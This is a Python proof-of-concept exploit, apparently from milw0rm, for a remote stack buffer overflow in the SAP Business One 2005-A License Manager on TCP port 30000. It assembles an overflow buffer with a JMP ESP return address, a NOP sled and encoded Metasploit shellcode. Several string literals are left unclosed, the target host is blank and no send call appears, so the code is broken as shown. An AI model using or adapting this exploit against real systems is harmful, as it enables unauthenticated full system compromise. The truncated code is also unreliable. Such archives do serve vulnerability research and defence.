import socket, time
# NT_Naming_Service.exe (License Manager 2005 for SAP Business One 2005-A) is #
# vulnerable to a stack-based buffer overflow allowing for full system compromise by #
# an unauthenticated user that has TCP/IP access to SAP's license service on TCP port 30000.#
# Mike Arnold ---> mikey27 .::at::. hotmail.com #
header = ("########################################################################\r\n"
"# SAP Business One 2005-A License Manager remote overflow PoC #\r\n"
"# Tested on 2005-A (6.80.123) SP:00 PL:06 #\r\n"
"# 2005-A (6.80.320) SP:01 PL:34 #\r\n"
"# OS: Windows Server 2003 R2 Std/Ent Service Pack 2 #\r\n"
"# Coded by Bruk0ut - mikey27 .::at::. hotmail.com #\r\n"
#metasploit windows/exec - notepad.exe x86/shikata_ga_nai 152 bytes
sc = ("\xbf\xd6\x21\x7d\x3b\xda\xdb\xd9\x74\x24\xf4\x33\xc9\x5d\xb1"
#JMP ESP 0x773a73fb User32.dll - Server2k3 R2 STD/ENT - SP2
ret = '\xfb\x73\x3a\x77'
giop_header = '\x47\x49\x4f\x50\x01\x00\x01\x00'
buff = giop_header + '\x2f\x5c' * 500 + "A" * 24 + ret + '\x90' * 44 + sc + '\x90' * 384
print (header)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect (('',30000))
print ("done!")
# milw0rm.com [2009-08-01]